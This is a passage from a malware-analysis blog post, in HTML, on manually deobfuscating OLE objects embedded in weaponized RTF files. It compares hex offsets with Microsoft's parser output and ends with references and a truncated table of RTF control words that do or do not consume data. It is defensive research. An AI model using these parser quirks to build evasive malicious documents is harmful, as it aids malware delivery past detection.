<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeunUpLwqG2N9u2KkXGtj4W9DVwmuW8vT85dPRvk9dYOhzxbXQASlzdAEZtbs3FXU9BwX6KBp3597FIojmwAwkYQLNhKzqVuTpKZQ4gVbRV5mcXzJRiFcffEwePNfiitlRr8CryTDbNDUQ/s1600/Screenshot+from+2018-11-12+22-48-56.png" />
</a>
</div>
</div>
<div>
The last interesting piece for us is on line 111 - <b>\bin</b> control word is used to convert 'P'
character into a hex value.
</div>
<br>
<div>
<button id="animation11Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation11')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation11" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png" />
</a>
</div>
</div>
<div>
Now open the OLE object carved from the memory in a hex viewer/editor. The carved object begins with the
following bytes: <b>88 D1 4E 04 02 00 00 00</b>. The same sequence can be found in the original RTF sample file
starting at line 80. This means that all the data from the beginning of 'objdata' group (line 67) up to
line 80 has been discarded. This includes the 2 groups and the sequence of <b>\'</b> special characters we
noted earlier.
</div>
<br>
<div class="row">
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfkoZIoUc2jlglvtv3tckmFRgV14kLHmG5AiuTPnnMPb1RwXGutI8gtmi8srpb10lSnhQMBZdKy7evDQuPIQRlmAGHw05ScnJp058Zy0lrQok0snbb6EegIoAo_14fOnoo0pU1Mh8wl-b3/s1600/Screenshot+from+2018-11-12+22-55-52.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfkoZIoUc2jlglvtv3tckmFRgV14kLHmG5AiuTPnnMPb1RwXGutI8gtmi8srpb10lSnhQMBZdKy7evDQuPIQRlmAGHw05ScnJp058Zy0lrQok0snbb6EegIoAo_14fOnoo0pU1Mh8wl-b3/s1600/Screenshot+from+2018-11-12+22-55-52.png" />
</a>
</div>
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDrS9-EdVjt7YHCukyk2JsZakDTSjdiDdUJrR01a3M0aLgsNyMviyYP8wkk2815q4qsuACDqxrsM5zNxUf0ND_RYYRLvAhQ_RPqhoPkrwCL5JBmSJhyphenhyphenKqG8FedcTpTpK7HbfCxTDIpgOri/s1600/Screenshot+from+2018-11-12+23-01-48.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDrS9-EdVjt7YHCukyk2JsZakDTSjdiDdUJrR01a3M0aLgsNyMviyYP8wkk2815q4qsuACDqxrsM5zNxUf0ND_RYYRLvAhQ_RPqhoPkrwCL5JBmSJhyphenhyphenKqG8FedcTpTpK7HbfCxTDIpgOri/s1600/Screenshot+from+2018-11-12+23-01-48.png" />
</a>
</div>
</div>
<br>
<div>
The data from the interesting group at line 95 does not appear to be present in the carved OLE object. We can
easily locate the data preceding it - <b>00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 </b>(offset 0x42D), but
not the data from the group. Byte <b>79</b>(offset 0x43C) follows the preceding data, meaning the interesting
group data has been discarded.
</div>
<br>
<div class="row">
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGA_AC_sSwDNiZlBiIAzrLDLALxMqOVj21kyuTNzYUWyjaHUeXUNBnrOZb2HkJTugryiIC5dyvGHw_3p06mmPX75Ldmtium3pCiQ2YXuBRzkesuSW__euCXOHLH8F2ngpO7s_rjtTcjvQX/s1600/Screenshot+from+2018-11-12+23-08-29.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGA_AC_sSwDNiZlBiIAzrLDLALxMqOVj21kyuTNzYUWyjaHUeXUNBnrOZb2HkJTugryiIC5dyvGHw_3p06mmPX75Ldmtium3pCiQ2YXuBRzkesuSW__euCXOHLH8F2ngpO7s_rjtTcjvQX/s1600/Screenshot+from+2018-11-12+23-08-29.png" />
</a>
</div>
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png" />
</a>
</div>
</div>
<br>
<div>
As expected the data from the group at line 100 has been discarded, but the sequence of escaped expressions
appear to be present in the carved OLE object. It begins at offset 0x43D and ends at 0x829.
</div>
<br>
<div>
<button id="animation12Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation12')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation12" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGi2ItRx_r_1kMzBSSdENlHMQCrEn6dIO7eanXKxQH8rodBcV6mfJ8pAr3qk0Yc7lRWQh5T_gUqSET42CuirWkEkPSWhj88Ehuz4y1dnZSzLPYxmJa2DIArQ2AyXzvFrNwCGS0lw5GgLJq/s1600/Peek+2018-11-12+23-41.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGi2ItRx_r_1kMzBSSdENlHMQCrEn6dIO7eanXKxQH8rodBcV6mfJ8pAr3qk0Yc7lRWQh5T_gUqSET42CuirWkEkPSWhj88Ehuz4y1dnZSzLPYxmJa2DIArQ2AyXzvFrNwCGS0lw5GgLJq/s1600/Peek+2018-11-12+23-41.gif" />
</a>
</div>
</div>
<div>
The last piece of data we're interested in is the one supplied to <b>\bin</b> control word. It's only 1
byte long and it's represented by 'P' character in the original RTF sample. We would expect it to
follow the sequence of escaped expressions and the plain text string - <b>700</b> located at line 108.
</div>
<br>
<div class="text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png" />
</a>
</div>
<br>
<div>
Character <b>P</b> has a hex value of <b>50</b>. Our expected byte sequence is <b>70 05 00 00 02 D3</b>, but
interestingly enough, there isn't such byte sequence present in the carved OLE object. Something isn't
the way we expected it to be after analysing the original RTF file manually. According to the native RTF parser,
this data transforms into this byte sequence - <b>70 50 00 00 02 D3</b>.
</div>
<br>
<div class="text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLAYpnXqtKPnFSgVuguzbYxlkXxzZ3S5qT6IwdENIuh3BsRrTqzRYmH31cdgbdFnW34H9w_sYospOSTmEjd9CqpgtYNUHtqZj4wT2a139-wNpjJq2oqdL_UEZ1Sb4q3iEe0DrQ2JtAYgNF/s1600/Screenshot+from+2018-11-12+23-16-55.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLAYpnXqtKPnFSgVuguzbYxlkXxzZ3S5qT6IwdENIuh3BsRrTqzRYmH31cdgbdFnW34H9w_sYospOSTmEjd9CqpgtYNUHtqZj4wT2a139-wNpjJq2oqdL_UEZ1Sb4q3iEe0DrQ2JtAYgNF/s1600/Screenshot+from+2018-11-12+23-16-55.png" />
</a>
</div>
<br>
<div>
Couple of things to note here:
<ul>
<li>the last <b>0</b> in 700 string disappears</li>
<li>the number of zeros after <b>50</b> (P converted to hex) is 5 and not expected 4</li>
</ul>
</div>
<br>
<div>
The last example shows how unexpected the results can be when trying to deobfuscate RTF embedded OLE objects
manually. Where doing it this way is fun and challenging, the only way to make sure the deobfuscation has been
successful is to compare it with the results of Microsoft's native RTF parser.
</div>
<hr>
<div class="container" id="credits">
<div>
<h4>Credits</h4>
</div>
<div>
Huge shout out to <a href="https://twitter.com/atorrrr">Andrew Torres</a> for crash course on Microsoft
Office applications debugging with x32dbg and overall feedback. This dude is a wizard!
</div>
<div>
Kudos to <a href="https://twitter.com/decalage2">Decalage</a> and <a href="https://twitter.com/DidierStevens">Didier
Stevens</a> for peer reviewing the wall of text above. I really appreciate it, folks!
</div>
</div>
<hr>
<div class="container" id="external">
<div>
<h4>External References</h4>
</div>
<div>
<ul>
<li><a href="https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html">How RTF malware
evades static signature-based detection</a>
</li>
<li><a href="https://securelist.com/disappearing-bytes/84017/">Disappearing bytes: Reverse engineering the MS
Office RTF parser</a>
</li>
<li>
<a href="http://decalage.info/en/rtf_tricks">Anti-Analysis Tricks in Weaponized RTF</a>
</li>
<li>
<a href="https://www.microsoft.com/en-ie/download/details.aspx?id=10725">Word 2007: Rich Text Format (RTF)
Specification, version 1.9.1</a>
</li>
<li>
<a href="https://www.oreilly.com/library/view/rtf-pocket-guide/9781449302047/">RTF Pocket Guide</a>
</li>
</ul>
</div>
</div>
<hr>
<div class="container" id="appendix">
<h4>Appendix</h4>
<h5>Control Words Search Table</h5>
<div>
<input type="text" id="controlWordInput" class="form-control" onkeyup="controlWordSearch()" placeholder="Search for control word...">
</div>
<br>
<div style="overflow:auto; height:200px;">
<table class="table table-striped">
<thead>
<tr>
<th scope="col">Control Word</th>
<th scope="col">Destination Flag (FALSE)</th>
<th scope="col">Destination Flag (TRUE)</th>
</tr>
</thead>
<tbody id="controlWordTable">
<tr>
<th scope="row">ApplyBrkRules</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">abslock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">additive</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">adjustright</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aenddoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aendnotes</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">afelev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnbj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftncn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">aftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnsep</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">aftnsepc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">aftntj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">allowfieldendsel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">allprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">alntblind</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">alt</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">annotation</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">annotprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ansi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">asianbrkrule</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">atnauthor</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atndate</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnicn</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnparent</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnref</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atntime</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atrfend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atrfstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">author</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">autofmtoverride</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">background</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bdbfhdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bdrrlswsix</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkhoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bkmkend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bkmkpub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bkmkstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">blipuid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bookfold</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bookfoldrev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">box</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrbtw</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdash</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdotdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdotstr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashsm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdremboss</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrengrave</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrframe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrhair</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrinset</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdroutset</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrsh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrthtnlg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrthtnmg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrthtnsg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthlg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthmg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthsg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthtnlg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthtnmg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthtnsg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtriple</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrwavy</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrwavydb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brkfrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">buptim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bxe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentfive</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentfour</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentsix</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentthree</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccenttwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cachedcolbal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">category</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">cbackgroundone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cbackgroundtwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cfollowedhyperlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkhoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbrdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chyperlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clFitText</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clNoWrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cldel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cldgll</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cldglu</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clhidemark</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clins</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmgf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmrgd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmrgdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clshdrawnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clsplit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clsplitr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxbtlr</th>
<td>Does not consume data</td>
